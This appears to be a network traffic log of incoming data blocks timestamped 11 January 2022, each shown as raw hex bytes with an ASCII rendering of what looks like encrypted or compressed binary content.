                                                                                                                                  2022-01-11 22:39:10 UTC5078INData Raw: a7 5e 4b c2 62 ce 65 83 c8 79 ba 91 bb 09 6e 06 f4 20 bd d8 2e 5c 27 ad 1d 3d f0 20 87 8f 7a 20 50 0a d8 26 4c c2 ae 9f 13 20 99 b4 83 e2 e3 c6 92 56 6a 74 0c 93 7e 8f 64 72 98 e7 2e 26 15 db 46 53 b3 f9 84 7f 1b 86 3c 5d 67 5d 25 6c 77 ec ab 04 fe 77 5b 5c 70 22 25 a1 80 66 c0 fd d9 81 02 20 ee d9 74 a7 85 cf cf 0a 3c 5e 47 29 7a 6f 1b 6a 29 3c 6b 15 34 2f 6c fc 89 8d 90 ae 01 af 31 ff b5 90 7e e5 28 a7 2a e9 2e a6 cb 05 10 4c d1 5b 63 eb 7b 37 95 e5 68 92 be 21 db f2 0f c3 90 f8 f6 e3 e6 08 74 fe 65 91 fc 80 99 ed 25 d8 f5 c2 78 37 c0 b7 da c3 90 1c b1 dc f3 f7 b6 d0 10 ad 88 e6 0e c7 08 b7 cc 91 e8 36 6d 4c ca 75 a5 86 2d 5b 8a 2b 16 9e c4 de 5c c7 5d e3 fa b2 94 3a da 84 32 34 12 47 2a 63 cf be 43 3d b7 ab 73 2c 11 ee e6 07 3d 9a fe cc be 94 f4 a7 74
                                                                                                                                  Data Ascii: ^Kbeyn .\'= z P&L Vjt~dr.&FS<]g]%lww[\p"%f t<^G)zoj)<k4/l1~(*.L[c{7h!te%x76mLu-[+\]:24G*cC=s,=t
                                                                                                                                  2022-01-11 22:39:10 UTC5094INData Raw: 36 3d 5c 9f b2 e0 52 a4 c8 32 47 19 78 cc de 70 f1 a7 82 d5 cf e1 54 f9 bd bb 92 03 f4 d7 a8 fc c8 d6 d0 9f 6b 0d cd dd ab 0d ab de fe 6d f1 77 8a d9 21 8f 0d 10 2d cc e5 77 56 23 fd 78 8d 42 0d c0 5c 71 3d f0 5a 8c 91 92 5a f6 e2 c1 70 54 bd 63 25 04 18 65 07 c3 3b cb c9 a6 8d e6 3a ff c3 43 26 54 20 a5 77 34 38 e3 19 7f e8 92 4d 8f 17 6d 40 e4 29 4f dd 18 2b 2c 37 bf 03 06 a5 85 11 ca 96 ad 32 02 45 da d2 e4 0b 8c 5c 12 91 0f 45 58 8b 52 64 19 32 51 b0 4a 1a 95 d3 e4 91 60 51 68 08 f7 aa 2e c8 b4 b4 a1 19 25 ff 09 17 80 aa a7 6f 1c df 59 1f 63 49 37 dd 0f 71 4e 97 8a b4 25 7d b8 f8 42 70 d0 d3 a0 cd 55 bc 29 58 29 63 84 20 0a 74 09 00 0c 01 a1 a0 52 1b 16 ee 7f 4e ed ac 7c 3f f3 8d 8e 6d 49 0e 77 78 9f 65 8a 3f 8b b2 76 2c 12 e7 c5 76 6f da 2c 37 6f b2
                                                                                                                                  Data Ascii: 6=\R2GxpTkmw!-wV#xB\q=ZZpTc%e;:C&T w48Mm@)O+,72E\EXRd2QJ`Qh.%oYcI7qN%}BpU)X)c tRN|?mIwxe?v,vo,7o
                                                                                                                                  2022-01-11 22:39:10 UTC5110INData Raw: 0b b9 64 45 bb 3c 62 95 a8 1f ee 75 1a 46 08 49 7c f6 92 cf 78 d6 43 e8 fd 98 4a 55 eb a7 ac ce c6 93 f5 59 5f 30 ba 2b 99 d6 74 db 1c 14 15 e6 a7 2a 99 59 99 54 8d 92 30 39 8b 70 00 50 12 56 f0 5a 7c 3e ef b9 3b 7c a6 49 1d 82 c8 f5 d5 f4 56 b1 e6 02 50 aa 9b eb 84 3f 04 79 09 9d 3a 5f 20 52 6d 5a ed d2 99 8d 3e b2 dd 56 9e 17 f6 eb 91 11 c5 7a 84 d5 be 75 1a 02 22 db e3 9b 79 78 ce 92 9e 7f 21 63 9b d5 56 56 4e ae 95 07 a2 0f c4 11 6c 5a 59 bc ac 28 e8 49 88 3e 4f 7c fd 58 ee 3e f7 f9 38 2f 74 26 31 18 7c b0 bd 57 2e cc c0 81 d0 4c a7 7c ce df 54 27 54 22 87 2d 98 0a 9b 85 ae 03 47 6f 22 81 9d 06 1e ad d2 41 98 bd e5 d5 ea d3 85 4d dd c4 88 d2 38 01 77 58 15 8e a6 de 69 76 44 fb c0 2b 5d 18 6b 97 69 94 56 34 f4 2c c9 98 f0 f4 7a 6f ed a3 2c d2 9d d1 ff
                                                                                                                                  Data Ascii: dE<buFI|xCJUY_0+t*YT09pPVZ|>;|IVP?y:_ RmZ>Vzu"yx!cVVNlZY(I>O|X>8/t&1|W.L|T'T"-Go"AM8wXivD+]kiV4,zo,
                                                                                                                                  2022-01-11 22:39:10 UTC5126INData Raw: f5 d2 3b 81 bb 36 62 bb 29 ba e7 b2 2e 9e f8 82 59 da 92 00 0a 86 93 58 ca 68 0a 5d f5 fc 24 67 d7 f6 06 96 9e 95 28 aa e7 81 cb 8c 0f 32 18 f1 b6 83 c8 97 2c 2d 6d 37 d1 ac 57 bc 26 e1 dd b7 ee 57 78 84 69 ea 28 e2 51 9e b1 fb 8a 83 13 a6 0c 29 7a 74 04 66 23 26 77 35 bd a3 b5 d7 e6 da 4d 11 3e 97 4d 95 89 59 33 21 27 3b 1e 81 e8 d9 2e 53 d9 e6 da a9 7a 53 65 03 72 98 96 9b 76 16 bb 43 df aa 0e 73 b9 5d 73 65 2b 7f 01 d1 63 65 0e 27 fe 99 01 7d 87 e5 95 e5 f5 9e 72 12 65 e5 ce 6f 81 a5 c7 51 38 77 25 f3 d2 b1 63 1d d7 c4 8d 76 4b 0e dc e4 ce 14 7c 81 40 7d 79 8f ff fe e1 42 7f be 29 bc 05 02 17 61 a1 76 ac 68 36 e4 06 69 ef e4 57 f6 58 c3 75 64 4d b2 29 c8 37 e1 c5 31 9a 94 e8 5e 33 bf 28 90 d1 4f 15 d8 34 92 02 d2 8a a9 6e f4 3e d5 ac f5 36 d5 04 ff dc
                                                                                                                                  Data Ascii: ;6b).YXh]$g(2,-m7W&Wxi(Q)ztf#&w5M>MY3!';.SzServCs]se+ce'}reoQ8w%cvK|@}yB)avh6iWXudM)71^3(O4n>6
                                                                                                                                  2022-01-11 22:39:10 UTC5142INData Raw: 16 fd ea ec 3c 77 b7 bc 19 bf 04 97 fe 2a a4 3d 66 81 49 de 74 fe 73 aa 94 70 6f f8 34 29 41 3a 73 92 11 95 2e 3a ad 9b b4 b3 12 94 0c b7 8b 02 8e 9e 87 9f cb 21 9c 62 b4 6e 15 2f 6f 3a 0f 42 e5 8b 4d 1d a6 6c 40 6e 00 ef 6d 5f 71 a5 8a 28 37 e5 b7 b4 97 95 4c d5 50 7c 24 82 af 4e b0 73 b4 69 8f db ac 34 39 f4 95 ef 4e 41 99 83 e0 00 33 0a 55 5d 55 42 9c 30 a3 b4 73 54 61 b0 da 5b 55 1b 19 12 5e fa c9 e1 ca 4f 42 6d 15 f2 b1 e4 22 dd 9b da 50 3b b3 0d 8b 29 c1 e0 00 94 85 2f 0c 02 81 f7 e7 dc 97 ed 54 bb 06 10 f9 a2 9d 36 9d 66 ea 51 4d a8 5a 26 08 24 45 a7 35 f2 66 bc f2 b0 f1 f4 cb a7 31 6a b0 47 fa d7 46 14 78 15 9b 81 c5 ef ce d8 6a 21 8e 07 03 b7 3b 4e 94 a9 78 65 a2 2c 79 04 2c 4f 48 05 f3 fa 62 7e f9 c9 e4 d9 e2 c9 d6 76 e5 c6 ef d5 cb 7e 69 72 08
                                                                                                                                  Data Ascii: <w*=fItspo4)A:s.:!bn/o:BMl@nm_q(7LP|$Nsi49NA3U]UB0sTa[U^OBm"P;)/T6fQMZ&$E5f1jGFxj!;Nxe,y,OHb~v~ir
                                                                                                                                  2022-01-11 22:39:10 UTC5158INData Raw: 91 f0 db d5 4b a7 2d 3c 0f ad 29 1a d3 50 dd 19 b5 b4 bf e9 aa 2c 57 cf e7 46 b7 9c e6 ec 2c e1 e8 92 79 0d bf 4e a3 1e fe de 43 e1 ce 0e 32 44 ce 5c 12 27 e4 7a 5f 5e 9a 74 4d eb 7f 20 cd f0 73 02 09 43 4c 65 41 26 1e f8 a5 4b 73 cb 90 39 ab 1d 83 c5 a3 39 97 77 3e 2e 6f c4 53 5c b8 11 31 3b aa 3e 81 9c 00 4a 5d 5c c9 7f 33 85 b4 e3 f8 d8 82 ea ff e1 bf c5 02 1e 89 b6 b6 3c 0c d8 87 32 e3 d9 42 ab ec 87 51 36 08 fd a7 68 b1 be e7 b6 2e e1 87 de c2 2c 03 9a f9 a9 61 b2 70 7a fb 73 cf df 36 16 dd b5 5d 9b 23 e7 9e 13 5d 69 e5 9a 19 5a cf 65 e9 a0 bb dd 57 cb 0b 49 31 f6 c7 e0 5d 5c b1 72 ec d2 ea bc 34 3b 14 d6 b4 cf 9f 58 6c 28 89 01 84 45 9e 70 7b 0f 6f 20 8a f6 5e 74 31 ee a7 98 0f 91 48 03 05 83 f2 15 1a 06 a5 fc 6f 81 a1 aa 65 5e 50 0e 89 61 db 9c 92
                                                                                                                                  Data Ascii: K-<)P,WF,yNC2D\'z_^tM sCLeA&Ks99w>.oS\1;>J]\3<2BQ6h.,apzs6]#]iZeWI1]\r4;Xl(Ep{o ^t1Hoe^Pa
                                                                                                                                  2022-01-11 22:39:10 UTC5174INData Raw: 7d f8 8d 32 95 69 de b3 18 a2 fe c2 b6 83 be b5 a6 6e 58 27 52 21 59 c2 89 a6 21 9e 02 e9 69 0b e8 ca fd 65 af 0e 3e d4 6c 0d c5 22 2e e3 ee 45 06 c2 d9 28 d2 3a 29 cb 52 a5 d6 e0 9a ce b8 8e eb f2 66 3c 4e 23 ee 6b b7 fd 06 71 38 02 3b 65 12 74 69 a9 8a 8d 90 63 4e 13 60 ca 26 d8 0b 21 f9 fb 9a 65 06 9f ab 45 50 67 87 e0 b1 76 30 4e 5c 18 93 ab ec 12 19 23 ea e3 1b 00 96 86 87 7c 47 00 e1 6b 08 40 46 8c 98 87 3d f1 1e ba 7f 2b b4 3f e3 53 69 9a a5 08 2f c8 a8 5b b2 d9 9c c1 b6 47 20 4e 7c 7f fb f2 9e 5b e8 48 ac ab 43 bb 39 6c aa bc af 13 61 b7 0f 27 70 98 cd 73 49 4e 6b 3b c9 52 ec d0 6b a1 ec bf ab e2 05 17 c6 1b ac a0 86 ad 79 b5 0d 99 ff 2d 91 e0 25 be 5e 3b 61 ad b9 5f de 03 21 43 87 3d 99 0e b5 53 3d a3 3e 1d 18 fd f1 93 40 a6 ff 9a 85 df aa 92 1f
                                                                                                                                  Data Ascii: }2inX'R!Y!ie>l".E(:)Rf<N#kq8;eticN`&!eEPgv0N\#|Gk@F=+?Si/[G N|[HC9la'psINk;Rky-%^;a_!C=S=>@
                                                                                                                                  2022-01-11 22:39:10 UTC5190INData Raw: 94 76 ee 37 d6 68 45 2b e1 c9 ec 51 58 39 40 5c a6 a6 4d 04 b7 8c 93 8f 56 45 7a e6 81 ba 6c d7 5d 2b 6a bc 41 af c0 0c f6 22 7e 3e 18 53 15 dc 1d 99 6b f1 d1 5f 9f 6f 5f 05 9a 54 09 e5 9f 95 c2 f6 45 13 c0 9d a1 a5 c7 49 9b fa 27 63 4f e3 ae 3f 48 2f 5d 1e 21 78 41 35 8c aa 66 dc e3 80 5d 68 47 78 00 fc 8f ed 93 e9 ca 2d ba dd 9f 36 68 14 73 2d 17 9d 40 b5 e2 a5 68 41 09 56 19 65 8b 8f 7f 7d 77 8d b0 8b 74 a2 ae 84 83 3f d3 76 04 cb 0d b8 fe 19 b3 cf f5 e9 44 91 a2 12 22 ed 00 fb 5d d8 c4 6d 2b 24 3f a1 07 b3 23 93 5b 78 30 7d 79 38 d0 bc 63 f5 9f 56 ff 46 44 27 7c cf 82 aa 4c 78 ee 76 da ad 1a c2 13 a9 36 0d a1 2a a9 05 82 e1 b4 46 56 99 13 68 0d 7d 19 7d cd f3 6e b2 d5 cd e0 e5 f3 fe 33 ed d0 df b0 5b 7a 43 4c 16 7e 3f 6d b4 7c 63 4f ff 41 d1 61 82 17
                                                                                                                                  Data Ascii: v7hE+QX9@\MVEzl]+jA"~>Sk_o_TEI'cO?H/]!xA5f]hGx-6hs-@hAVe}wt?vD"]m+$?#[x0}y8cVFD'|Lxv6*FVh}}n3[zCL~?m|cOAa
                                                                                                                                  2022-01-11 22:39:10 UTC5206INData Raw: b4 2d a7 83 0b 66 44 dc 4e 2e d6 d5 71 14 ee 2b f4 9f 91 4a 33 0c fa 73 69 47 c7 e0 ad 7a e1 73 cb 9b 00 fd fb 2d e7 aa 64 61 5f 73 ca 88 fc 1e 3c 41 10 51 51 fd 61 47 ec 5a dd 2f 8e 20 fd 59 fb ef 2c 68 0f e2 de f4 87 e5 59 67 3c 3b 66 f8 bf b1 86 28 ca 3e 49 7a 5c 66 16 fd ca 8b e5 17 59 56 20 ca 8a 0e b4 df 00 15 4f 7a c1 5e 64 8f 5e ca c6 63 5e cd 32 4b 8a ef d9 3c db 26 19 44 a9 0a 50 9e d5 ab a1 8d bc 81 b6 c3 b5 4c 86 42 4b 83 81 90 2b 01 dd 0b 16 19 54 ac 2c e6 b7 6b 20 62 79 fc 32 0d df cf 12 26 ff 1d 5d 41 82 60 59 06 0a af 87 66 af 95 44 78 41 40 a2 f1 1d 0b 54 b7 c5 93 60 d2 47 a1 97 14 c0 67 b1 51 4c 1c e6 d7 1c 27 4f c4 f3 a7 24 1a 8b 60 6a d3 8d d2 db 2a b5 f1 4f 47 d2 1e 51 a5 07 88 eb 68 cd 3b a8 ef dd 97 5a 90 1d d1 a4 aa a3 db e8 af e8
                                                                                                                                  Data Ascii: -fDN.q+J3siGzs-da_s<AQQaGZ/ Y,hYg<;f(>Iz\fYV Oz^d^c^2K<&DPLBK+T,k by2&]A`YfDxA@T`GgQL'O$`j*OGQh;Z
                                                                                                                                  2022-01-11 22:39:10 UTC5222INData Raw: 74 82 83 dd c6 ee 67 37 ca 2d 98 d5 69 f3 ea 7b aa 59 a9 3e 61 c0 68 5d fe ad df b7 bb 7d a0 6e ff 0f ee f2 16 ef 99 ec 71 b6 b2 19 fc 91 3d 12 7c 66 a9 0e 58 cd 29 7c 9f 01 0c d1 be c0 a2 8b 99 93 33 7d ed 0d 87 68 2f 9f ce 7f 0b 8f be 51 b8 b3 99 16 07 79 8f df c9 e1 e5 cd 09 48 10 0b fc 80 ed c2 d5 de 65 f0 cb 7b 30 5b 8d ac f5 e6 2f 84 4c 92 62 e0 7b 03 8b 64 07 92 a7 62 d9 68 b4 0f 6c ec ac 72 cd ab fe db a2 16 c4 4e fb f7 dd 21 a1 10 bc 36 34 00 49 ef fa a3 88 af b9 1b b0 cd 32 82 7f 11 11 7f 38 32 48 38 86 81 ef b1 57 f1 e7 d4 d9 ab b9 92 00 cd f2 d2 14 9a 8e 80 ac a0 1e 26 16 d7 fb 70 7d 55 eb c4 21 b2 f1 9e 4d 8b d4 d8 88 02 9d 2e 0c 7a f6 3e 63 14 76 50 7d 1b 8d 08 82 4f b9 5d b7 74 67 ba 9d 03 b6 f2 b7 38 30 4e ae ab ef a4 20 a8 3a d2 2d 1d 0d
                                                                                                                                  Data Ascii: tg7-i{Y>ah]}nq=|fX)|3}h/QyHe{0[/Lb{dbhlrN!64I282H8W&p}U!M.z>cvP}O]tg80N :-
                                                                                                                                  2022-01-11 22:39:10 UTC5238INData Raw: 6f c9 cb 87 4b 6c c5 a2 8a cf ab 9f 04 7c b7 e3 04 66 72 db ac 96 b5 ef 91 c0 f8 14 fd cd dd 1b 2d 59 3f 76 3c 1d 78 bf c0 7a 7a d1 74 50 da d9 bc ce 49 e6 3c 21 92 ed 0f e5 8b 13 1d 5d 8f aa 38 6d 4c 79 96 77 36 1c 7e 70 ce c1 89 bf bc ec 75 3a 3f 32 3b d8 49 df df 7e e3 99 7a cc dc 11 5b 07 2c 4c ee b7 92 0f 1a 52 d6 87 ac 6d 39 81 e0 e3 43 ea 3d c0 6c f1 88 eb ce 8e 17 0a b0 3c 4a b3 94 e8 fc 14 b9 04 a7 4e 60 4e 82 0d 1d e7 6e 8d a7 b5 f0 68 49 3d ac 1d 6d 8a 4a b7 c2 7c b0 20 50 be 51 14 d6 56 e6 6c 1e 3c e7 7a a0 28 7d 96 3a dc f2 1b 67 84 cf eb ca b2 24 7a dd 22 6e b7 cd c6 0d e8 e8 2a 90 08 ac 86 3d 97 81 31 dd 71 eb d3 23 52 5a fd 0f 02 89 fe a6 a6 11 82 89 db da 2d 11 41 61 ed 79 ba a0 cd df 97 93 f6 bd 47 54 1c 5e de ae 9e fd 3b 25 a8 dc b0 f3
                                                                                                                                  Data Ascii: oKl|fr-Y?v<xzztPI<!]8mLyw6~pu:?2;I~z[,LRm9C=l<JN`NnhI=mJ| PQVl<z(}:g$z"n*=1q#RZ-AayGT^;%
                                                                                                                                  2022-01-11 22:39:10 UTC5254INData Raw: 83 27 ca a0 61 2a 93 c2 2f 71 c2 25 47 e3 69 13 bf 03 5a 59 68 ab fd 04 49 ed 95 6c 49 96 ae 23 78 5a f2 ca bc 2d 4a f3 4e ce c3 b7 a3 26 d8 c0 a6 79 81 48 9b 62 d0 ed 0d 70 39 13 6b 0d 52 b4 ce c4 f8 83 5b 33 5f 64 e5 b5 2e cc 68 06 74 1d 1c 7e aa 67 29 34 1e a4 1c 3b 20 8c 16 45 26 10 90 19 4b a5 54 a7 a5 0f 18 bb 31 c7 d5 56 e1 bd 07 3c 20 cf 54 a8 2f bd 33 ad e0 43 ea 23 a4 82 dd 2a df b0 89 94 e9 8b be b4 fb c1 94 b1 41 36 52 25 25 46 aa 63 94 4a 19 e0 94 00 bb eb bd 6c 7c 34 aa 98 88 90 9d 32 c0 6d 8d 9e 98 69 dc 9c e2 fb 02 6c 4a e5 4c 70 a7 4f 9c c3 cb ae 31 4b 94 a5 e8 45 f0 1e 2f 50 03 2b bd 88 db 6d d8 a9 ed 97 64 46 ba 07 04 86 a3 73 3b 7d ca 68 a0 0c 9d 48 cd dd 18 b9 02 88 86 86 05 c2 9a 34 b8 bb 90 3e 7e 49 2f f8 25 e4 33 cf e8 89 8a ae 12
                                                                                                                                  Data Ascii: 'a*/q%GiZYhIlI#xZ-JN&yHbp9kR[3_d.ht~g)4; E&KT1V< T/3C#*A6R%%FcJl|42milJLpO1KE/P+mdFs;}hH4>~I/%3
                                                                                                                                  2022-01-11 22:39:10 UTC5270INData Raw: 5d bc 99 17 cc c3 e3 24 1c 65 6c 83 ff 8f 36 2b f1 26 b0 c4 de c0 d7 b1 08 94 95 2e c7 06 7d 59 16 47 6f c0 70 b6 18 6d 6e 46 c7 ba 77 18 ca 09 e5 58 f6 8a d1 b4 db 93 e0 0b 59 5a db 49 e8 b5 ec 0f 7d 53 88 4b c8 a8 50 88 4b 61 7c 96 5e c5 36 95 51 d9 42 b6 03 75 f2 80 a8 25 2b bd 6b f4 fb 6e 8c fd a9 a4 e7 b6 ef 2b 27 ae 4b 8a bf 47 65 25 12 7a b6 25 00 e5 77 17 ac b0 16 e4 6b b6 4e 43 bc f4 ae c0 41 f0 57 e1 29 1f c8 a0 6c 6b e6 54 69 49 e5 51 5d 04 e5 fe d4 b9 26 4c 18 ae 25 ff 68 8f 5c 49 2f e9 0f 80 0d b4 c5 a2 4b 5e 73 65 3b 72 b8 8c 0a 7a 61 c5 22 58 f1 f6 32 ed f4 b4 af e2 a7 de 53 04 a9 da 4c 33 66 e9 d0 7d db 6e 55 f5 fa 6b f1 8e 2b 06 b8 e1 50 17 7e a7 a0 95 fa c2 2a 6c 51 a2 d6 ce 91 db 96 99 fd 8a c6 c0 9f 7d 46 05 bf 8a eb 85 27 d8 72 8d 53
                                                                                                                                  Data Ascii: ]$el6+&.}YGopmnFwXYZI}SKPKa|^6QBu%+kn+'KGe%z%wkNCAW)lkTiIQ]&L%h\I/K^se;rza"X2SL3f}nUk+P~*lQ}F'rS
                                                                                                                                  2022-01-11 22:39:10 UTC5286INData Raw: 20 4c 3f f7 bd 2c 5a 0a 2c e4 1e 0e 0a f4 9e 53 b3 da d9 5d a7 b6 d1 23 b3 f0 7a 59 f6 f8 81 43 94 73 5a 6d b3 92 06 b6 16 b3 cb f8 24 e9 79 b3 cd 7c 2e 9d b6 eb 9f e0 77 88 09 27 66 54 30 95 5f 35 ec 8c 57 db a0 12 3c 49 7e 8a 53 02 fa d3 3a f3 de 86 93 5c f5 3d ca d8 3a a3 14 50 df 9e 4f 72 94 b5 f8 89 59 aa a2 57 09 ed 69 c1 0e a2 9c 98 87 0a 21 a9 f4 59 41 36 9d cc b6 1c b8 50 14 a0 c5 89 d1 d7 de 1c d9 4c a9 d0 3b 84 f6 b5 40 0f fe 3f 93 25 30 27 41 e4 5b cd 33 f5 3f 63 da 18 09 5a 9d eb ee 2d 33 36 8f aa 6e 26 9e 2b 2e 6a f4 73 fd 8f c8 6e e7 d2 0e b7 db 26 06 f0 5f 11 61 9a 47 17 65 a7 5f 77 f4 1f 8e 87 78 c9 9e f7 7c 38 79 b1 24 8f 08 0b cf 65 ea 5f 26 c4 99 9d 9d 4c 93 85 57 06 d9 b1 d3 35 10 8f 49 2d 5d 39 60 83 b3 af fb 51 1d 3a 13 ef 79 bb 44
                                                                                                                                  Data Ascii: L?,Z,S]#zYCsZm$y|.w'fT0_5W<I~S:\=:POrYWi!YA6PL;@?%0'A[3?cZ-36n&+.jsn&_aGe_wx|8y$e_&LW5I-]9`Q:yD
                                                                                                                                  2022-01-11 22:39:10 UTC5302INData Raw: f8 32 e3 a4 46 d5 2b 7f c3 b7 69 c9 cc 90 67 e7 da 72 cb 28 7b 58 c5 37 20 35 7b 9c d2 12 f1 53 21 77 e3 a1 ef c4 c8 6b 4d 26 16 d6 58 43 bc 4a da 48 12 c4 ef 8e 6a fe b4 42 e4 5c fb 16 91 cd c2 9d ed 99 bb 24 a1 09 21 00 b7 a6 09 a1 c8 92 4d 90 bd eb 43 9d c6 67 87 5c f5 f9 69 a0 fa 7b c6 75 41 ee c3 1d 9c 8e 51 6b 3d a6 a9 eb ea 82 20 e8 3a 2a 43 ca e0 31 06 ab 96 47 46 42 b8 11 c3 3d e1 6d dd 96 90 f7 6e a9 be 3d 54 bd 33 e9 4e b9 db b6 e1 0e 64 f2 65 b5 3a a5 dc 67 6e 5f 49 0c 3e 55 a4 1e 97 97 22 61 12 2c 87 35 76 ae 7a 17 e6 9b 20 1e 7c 68 b7 aa 3c 17 2b 72 b3 07 63 a3 36 e8 4d d7 cf 7e 9c ae 25 d7 b5 8a 82 0f 8c 46 cc 1c 7f d0 9e 23 c5 6a 0c a9 2e 95 50 d5 e6 d2 c4 7e fd 93 79 dc d1 5a 84 10 fa ed 01 88 5e ef 4b 85 66 f5 97 b8 01 bb a6 f5 cd a9 6e
                                                                                                                                  Data Ascii: 2F+igr({X7 5{S!wkM&XCJHjB\$!MCg\i{uAQk= :*C1GFB=mn=T3Nde:gn_I>U"a,5vz |h<+rc6M~%F#j.P~yZ^Kfn
                                                                                                                                  2022-01-11 22:39:10 UTC5318INData Raw: 15 5b cd a9 3b bc 96 4d a5 b1 57 d8 19 7e 27 eb 31 65 96 56 59 f3 bf ae e5 b3 bd 0d cd 9d a9 a6 ba 9a 8d 05 89 a3 01 3b a9 e2 8b 90 31 d5 98 3b 37 d2 27 5a fb e9 d7 78 74 12 7b cd 4f 39 5f cf b9 ca 89 02 a8 e2 62 f0 bd 4c 94 2f 80 c0 38 24 f2 65 a6 fd f7 ae 0c c1 78 98 81 1e e6 f4 65 b7 17 be 95 19 83 34 c8 6e 8f ff 06 67 36 44 b8 fe 65 8f 1f c6 2e 44 d2 af 47 65 e0 f2 86 88 05 00 df 8e bc 72 a2 ee e6 3a 35 f0 16 e0 4b 43 70 fc ed 1c aa b5 07 5e 3f 1c 24 99 4e 12 6a 4e 71 7f a5 5a c5 28 36 27 3e fb 46 04 b1 43 46 60 cb 3d 23 0c b7 ae 9c 4d ce 6a 30 93 2b 95 20 fd d7 5e e0 31 00 c0 be a4 70 77 78 99 8d 1d 4f e5 57 91 10 c3 7c b6 08 8a ec 49 c7 d5 74 42 84 b5 50 70 53 d1 dc 32 ee e7 63 88 d1 c8 a5 9c 98 ac a4 71 08 4f 1c 83 26 6a 43 da 19 56 31 e5 6d f3 5e
                                                                                                                                  Data Ascii: [;MW~'1eVY;1;7'Zxt{O9_bL/8$exe4ng6De.DGer:5KCp^?$NjNqZ(6'>FCF`=#Mj0+ ^1pwxOW|ItBPpS2cqO&jCV1m^
                                                                                                                                  2022-01-11 22:39:10 UTC5334INData Raw: 85 c3 83 38 1b 44 17 fc a8 fd f0 df 1c 56 ba 4d 4d 07 50 06 4e 84 93 f3 f4 1c 44 2c 6c 09 ac 1d 78 36 22 6c e9 f5 21 df 1c d6 b5 3c 3f 23 e8 15 de e4 1b d4 78 04 9b 49 91 81 3c 9c f3 eb 02 37 6a d7 1e 1f e1 38 28 11 45 d4 05 a4 92 1f b4 bd bb 2a 1f 95 d3 6d 59 e2 9a 97 39 db 68 33 d5 25 81 f1 cb 99 02 52 21 2c f7 46 c6 29 ca 62 5e a2 5f 25 96 1f c5 48 09 cc f2 7c df fe 7a 80 19 19 b8 17 97 68 26 7b 8a 7f 06 bf 1d 11 27 71 b4 e5 64 40 53 6a de 2c f0 ac d5 0e ac a3 74 22 70 ff 81 86 8a 72 46 24 04 a1 6d d1 63 5d d7 05 bb d6 fb 92 f8 b3 9b b0 03 a1 bf 23 45 49 d3 5d 7f 79 e3 52 b6 f3 b9 a7 4d 8c 60 f9 34 0f d7 4e 6f d9 64 39 44 92 99 90 35 15 6d cb 57 5d bd ae 15 37 7c f5 e9 fe 03 b0 ca ad b8 3b d4 0d b5 96 e0 95 10 fb 09 e7 61 b1 71 81 df 8a b6 39 34 54 77
                                                                                                                                  Data Ascii: 8DVMMPND,lx6"l!<?#xI<7j8(E*mY9h3%R!,F)b^_%H|zh&{'qd@Sj,t"prF$mc]#EI]yRM`4Nod9D5mW]7|;aq94Tw
                                                                                                                                  2022-01-11 22:39:10 UTC5350INData Raw: bd 2f 75 74 84 23 85 ea c5 24 a8 b7 cd b4 40 59 d5 9c 93 5e 87 1f 13 ff 15 17 9f 4c 1d f4 c5 87 b8 f8 0a bf 23 74 ce 7a 38 57 0e 18 c0 bc 16 ed 8f 67 48 c3 a6 53 c4 8c 77 3a 25 20 d9 38 d4 d9 60 ca dc 70 27 a2 fd d8 dd 42 f8 c1 f8 4d 0d 38 02 56 31 e1 53 9c 70 eb 11 e1 89 f3 41 9e 65 12 73 27 d1 22 a0 ba b4 e9 fc 4b 5a 90 dc 4e cd e5 ce 27 3c 55 7b 65 8f a4 64 12 eb 42 f7 62 f3 8d 8f dd ca 4a df 4e eb 74 82 9a 86 62 90 0f b7 e1 03 ce 1c 44 8b b0 c7 2f ed f5 97 6a 8d 62 46 46 3d da e7 b8 e4 f4 83 45 6d 25 a5 d5 1b f6 ab 50 07 23 2e 96 8a 02 4f 44 6f 69 55 ad 26 ed 37 9c 9a 15 db 8b d7 c3 c9 8e 94 06 7e 5d 85 f9 f7 e0 25 ae 42 e1 a3 2f e5 2d 72 7d 91 78 b0 ee 0c c1 ab 5f c2 9e a3 3b 5f 0a e5 62 e1 4c 9f ba 83 7b b3 9e d9 52 ef 6b 54 e5 5b 1c 2a 54 23 a6 18
                                                                                                                                  Data Ascii: /ut#$@Y^L#tz8WgHSw:% 8`p'BM8V1SpAes'"KZN'<U{edBbJNtbD/jbFF=Em%P#.ODoiU&7~]%B/-r}x_;_bL{RkT[*T#
                                                                                                                                  2022-01-11 22:39:10 UTC5366INData Raw: d8 1e ad b1 5b 0d 00 68 c5 11 d7 d7 e0 c3 db 30 b3 56 34 05 57 70 87 20 80 7a 4a fb ff 93 8a 5e ab 35 b0 e8 de e3 e7 a4 b9 85 2e 49 3a ff e8 38 0e e5 62 74 1c e9 ec 01 70 ff 50 9a e6 f3 99 c4 94 ca 97 8f db 5f 8b 06 c3 3d 77 31 91 ea 22 f9 db 12 2f f6 68 88 7b ac 0e 00 5f d1 39 f9 37 da 60 f9 ff 8d 63 88 03 9e 33 fd 1c d6 e7 69 3a 9c de ae 9d f1 8f c3 93 f6 c5 39 a1 04 e3 84 40 5e a1 a8 29 f8 83 fb 44 48 95 57 94 20 85 9c a5 fb 75 a8 f4 0d 75 c8 7e 96 b7 71 f1 4a 12 d2 58 3f 7b c6 38 38 c4 91 d2 4e 05 62 43 00 a2 a0 fe d1 59 87 b6 ac 25 cc f3 a3 4c c4 b0 e0 97 78 37 22 91 26 44 dc fc 6a ca 13 8e a6 f3 4d 97 76 ad de 28 1b 27 50 1b 1b c6 02 f7 86 5d 5a 49 5a a4 a1 17 84 67 c2 62 cb ee 18 25 4c 35 5e d7 64 2e e3 69 95 5d c1 04 b1 45 3b 3a 92 6c 57 09 70 b7
                                                                                                                                  Data Ascii: [h0V4Wp zJ^5.I:8btpP_=w1"/h{_97`c3i:9@^)DHW uu~qJX?{88NbCY%Lx7"&DjMv('P]ZIZgb%L5^d.i]E;:lWp
